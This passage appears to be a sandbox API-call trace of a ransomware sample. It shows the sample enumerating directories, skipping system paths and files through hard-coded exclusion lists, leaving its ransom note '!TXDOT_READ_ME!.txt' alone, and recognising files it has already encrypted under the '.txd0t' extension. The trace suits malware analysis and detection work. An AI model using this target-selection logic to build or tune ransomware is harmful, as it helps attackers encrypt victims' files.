(lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\local\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\boot\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\perflogs\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\programdata\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\drivers\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\wsus\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="crypt_detect") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="cryptolocker") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="ransomware") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\WINDOWS") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files") returned 0x0 [0128.755] GetProcessHeap () returned 0xe30000 [0128.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.755] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0128.755] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\*") returned="C:\\588bce7c90097ed212\\1053\\*" [0128.756] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x589e5c0d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.756] StrCmpW (psz1=".", psz2=".") returned 0 [0128.756] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x589e5c0d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.756] StrCmpW (psz1="..", psz2=".") returned 1 [0128.756] StrCmpW (psz1="..", psz2="..") returned 0 [0128.756] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58868375, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58868375, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5888e589, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.756] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.756] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.756] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0128.756] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0128.756] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1053\\!TXDOT_READ_ME!.txt" [0128.756] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.756] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.756] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.756] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58868375, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1119, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.756] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.756] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.756] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0128.756] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0128.757] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t" [0128.757] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.757] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.757] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x589bf977, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13170, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.757] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.757] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.757] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0128.757] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0128.757] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t" [0128.757] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.757] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.757] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.757] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.757] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.757] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0128.757] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0128.757] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" [0128.757] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.757] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.757] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.757] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.757] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.757] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.758] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.758] GetProcessHeap () returned 0xe30000 [0128.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.758] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1055", cAlternateFileName="")) returned 1 [0128.758] StrCmpW (psz1="1055", psz2=".") returned 1 [0128.758] StrCmpW (psz1="1055", psz2="..") returned 1 [0128.758] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.758] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1055", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system32\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\local\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\boot\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\perflogs\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\programdata\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\drivers\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\wsus\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="crypt_detect") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="cryptolocker") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="ransomware") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\WINDOWS") returned 0x0 [0128.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files") returned 0x0 [0128.825] GetProcessHeap () returned 0xe30000 [0128.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.825] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0128.825] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\*") returned="C:\\588bce7c90097ed212\\1055\\*" [0128.825] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.826] StrCmpW (psz1=".", psz2=".") returned 0 [0128.826] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.826] StrCmpW (psz1="..", psz2=".") returned 1 [0128.826] StrCmpW (psz1="..", psz2="..") returned 0 [0128.826] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a0bd71, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a583d5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.826] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.826] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.826] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0128.826] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0128.826] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1055\\!TXDOT_READ_ME!.txt" [0128.826] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.826] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.826] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.826] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1113, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.826] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.826] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.826] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0128.827] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0128.827] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t" [0128.827] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.827] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.827] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12e12, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.827] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.827] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.827] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0128.827] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0128.827] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t" [0128.827] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.827] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.827] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.827] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.827] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.827] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0128.827] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0128.827] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" [0128.827] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.827] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 